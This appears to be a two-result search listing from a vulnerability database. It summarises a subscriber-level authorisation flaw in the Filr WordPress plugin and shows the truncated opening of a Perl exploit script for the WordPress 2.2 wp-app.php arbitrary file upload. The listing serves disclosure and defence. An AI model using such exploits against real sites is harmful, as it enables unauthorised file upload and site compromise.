2 matches found
Filr - Secure Document Library < 1.2.2.1 - Subscriber+ AJAX Calls
The plugin does not have authorisation check in two of its AJAX actions, allowing them to be called by any authenticated users, such as subscriber. They are are protected with a nonce, however the nonce is leaked on the dashboard. This could allow them to upload arbitrary HTML files as well as...
WordPress Core 2.2 - 'wp-app.php' Arbitrary File Upload
!/usr/bin/env perl Wordpress 2.2 and Wordpress MU Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html use Digest::MD5 qwmd5hex; use LWP::UserAgent; my $ua = new LWP::UserAgent; my $blog = $ARGV0; my $user = $ARGV1; my $pass = $ARGV2; my...